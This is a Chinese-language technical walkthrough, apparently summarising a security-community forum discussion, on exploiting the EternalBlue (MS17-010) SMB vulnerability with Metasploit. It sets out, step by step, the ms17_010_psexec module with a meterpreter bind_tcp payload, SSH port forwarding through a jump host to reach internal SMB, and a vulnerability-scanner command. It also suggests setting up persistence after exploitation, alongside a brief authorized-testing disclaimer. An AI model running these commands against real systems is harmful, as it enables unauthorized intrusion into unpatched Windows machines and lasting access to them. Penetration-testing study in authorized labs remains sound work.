看我用内网MSF打公网永恒之蓝
字数 827 2025-08-06 20:12:43
内网MSF攻击公网永恒之蓝技术分析
技术背景
本文档基于奇安信攻防社区讨论内容,分析使用Metasploit Framework(MSF)在内网环境中攻击公网永恒之蓝漏洞的技术实现方法。
永恒之蓝(EternalBlue)是NSA泄露的针对Windows SMB协议漏洞(MS17-010)的攻击工具,该漏洞影响Windows 7/Server 2008 R2及更早版本。
攻击场景
讨论中涉及两种主要攻击场景:
- 正向payload直接攻击方法
- SSH隧道转发方法
正向payload攻击方法
技术要点
- 正向payload原理:与反向shell相反,攻击者直接连接目标机器的监听端口
- 适用场景:当目标机器位于公网且有开放端口时可直接使用
- MSF模块:可使用
exploit/windows/smb/ms17_010_psexec等模块
实施步骤
-
配置MSF攻击模块:
use exploit/windows/smb/ms17_010_psexec set RHOSTS <目标IP> set PAYLOAD windows/meterpreter/bind_tcp set LPORT <监听端口> exploit -
可能需要调整的配置项:
SMBUser和SMBPass:如果目标系统需要认证SMBDomain:域环境设置RPORT:非标准SMB端口(默认445)
SSH隧道转发方法
技术要点
- 适用场景:当目标在内网而攻击者在公网时
- 优势:无需额外软件,利用SSH内置功能
- 实现原理:通过SSH端口转发建立内网到公网的通道
实施步骤
-
建立SSH本地端口转发:
ssh -L <本地端口>:<内网目标IP>:445 <跳板机用户>@<跳板机IP> -
配置MSF攻击本地转发端口:
use exploit/windows/smb/ms17_010_psexec set RHOSTS 127.0.0.1 set RPORT <本地端口> exploit
注意事项
- 目标环境:讨论中提到靶场"谜团"可能已不可用,需自行搭建测试环境
- 防御措施:现代系统通常已修补该漏洞,实际攻击需针对未更新系统
- 法律风险:仅限授权测试,未经授权攻击属于违法行为
扩展思考
- 替代方案:讨论中提到正向payload可能可行,但未详细测试
- 网络拓扑:实际环境中需考虑NAT、防火墙等网络设备的影响
- 权限维持:成功利用后应考虑如何建立持久化访问
参考命令
常用MSF永恒之蓝检测命令:
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS <目标IP范围>
run
以上内容基于社区讨论提炼,实际应用需根据具体环境调整参数和方案。